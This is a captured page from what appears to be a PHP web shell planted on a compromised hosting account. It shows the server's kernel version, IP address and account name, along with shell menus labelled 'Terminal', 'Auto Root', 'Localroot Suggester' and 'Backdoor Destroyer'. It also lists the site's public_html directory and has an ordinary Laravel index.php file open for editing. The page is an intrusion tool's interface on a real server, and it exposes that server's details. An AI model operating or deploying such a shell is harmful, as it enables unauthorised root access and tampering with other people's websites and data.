Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.64
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
public_html /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2026-06-12 14:47
app
[ DIR ]
drwxr-xr-x
2026-07-19 11:38
assets
[ DIR ]
drwxr-xr-x
2026-07-12 13:19
bizet.pilasatech.net
[ DIR ]
drwxr-xr-x
2026-06-24 22:58
cgi-bin
[ DIR ]
drwxr-xr-x
2026-06-09 16:52
come_bck_soon
[ DIR ]
drwxr-xr-x
2026-06-01 03:28
css
[ DIR ]
drwxr-xr-x
2026-06-01 03:28
erpsaas.pilasatech.net
[ DIR ]
drwxr-xr-x
2026-07-20 17:53
hiyabplc
[ DIR ]
drwxrwxrwx
2026-07-19 18:48
images
[ DIR ]
drwxr-xr-x
2026-07-12 20:11
js
[ DIR ]
drwxr-xr-x
2026-06-09 16:52
liftride.pilasatech.net
[ DIR ]
drwxr-xr-x
2026-07-20 17:53
logo
[ DIR ]
drwxr-xr-x
2024-08-16 14:54
new
[ DIR ]
drwxr-xr-x
2026-07-19 11:21
new_admin
[ DIR ]
drwxr-xr-x
2026-06-01 03:28
pilasa
[ DIR ]
drwxr-xr-x
2026-07-19 11:23
pilasawebsite
[ DIR ]
drwxr-xr-x
2026-07-12 20:11
remit.pilasatech.net
[ DIR ]
drwxr-xr-x
2026-07-20 17:53
ride.pilasatech.net
[ DIR ]
drwxr-xr-x
2026-07-20 17:53
seretpay.pilasatech.net
[ DIR ]
drwxr-xr-x
2026-07-24 16:51
seretsale.pilasatech.net
[ DIR ]
drwxr-xr-x
2026-07-20 17:53
test
[ DIR ]
drwxr-xr-x
2026-07-12 13:25
.htaccess
30.21
KB
-rw-r--r--
2026-07-26 05:19
-index.html
7.98
KB
-rw-r--r--
2024-08-16 14:54
create_symlink.php
267
B
-rw-r--r--
2024-08-16 14:54
error_log
613
B
-rw-r--r--
2024-08-16 14:54
hiyabplc.zip
161.91
MB
-rw-r--r--
2024-08-16 13:41
index.php
2
KB
-rw-r--r--
2026-07-12 20:34
info.php
16
B
-rw-r--r--
2026-07-12 20:18
pilasa (1).zip
77.77
MB
-rw-r--r--
2024-08-16 14:14
pilasa.ico
31.29
KB
-rw-r--r--
2024-08-16 14:54
pilasawebsite.zip
9.67
MB
-rw-r--r--
2024-08-16 15:01
robots.txt
24
B
-rw-r--r--
2026-07-12 20:18
subscribe.txt
3
B
-rw-r--r--
2024-08-16 14:54
web.config
914
B
-rw-r--r--
2024-08-16 14:54
Save
Rename
<?php /** * Laravel - A PHP Framework For Web Artisans * * @package Laravel * @author Taylor Otwell <taylor@laravel.com> */ /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader for | our application. We just need to utilize it! We'll simply require it | into the script here so that we don't have to worry about manual | loading any of our classes later on. It feels great to relax. | */ // require __DIR__.'/../bootstrap/autoload.php'; require __DIR__.'/../pilasa-core/bootstrap/autoload.php'; // require '/home/pilasatech/pilasa-core/bootstrap/autoload.php'; /* |-------------------------------------------------------------------------- | Turn On The Lights |-------------------------------------------------------------------------- | | We need to illuminate PHP development, so let us turn on the lights. | This bootstraps the framework and gets it ready for use, then it | will load up this application so that we can run it and send | the responses back to the browser and delight our users. | */ // $app = require_once __DIR__.'/../bootstrap/app.php'; $app = require_once __DIR__.'/../pilasa-core/bootstrap/app.php'; // $app = require_once '/home/pilasatech/pilasa-core/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Application |-------------------------------------------------------------------------- | | Once we have the application, we can handle the incoming request | through the kernel, and send the associated response back to | the client's browser allowing them to enjoy the creative | and wonderful application we have prepared for them. | */ $kernel = $app->make(Illuminate\Contracts\Http\Kernel::class); $response = $kernel->handle( $request = Illuminate\Http\Request::capture() ); $response->send(); $kernel->terminate($request, $response);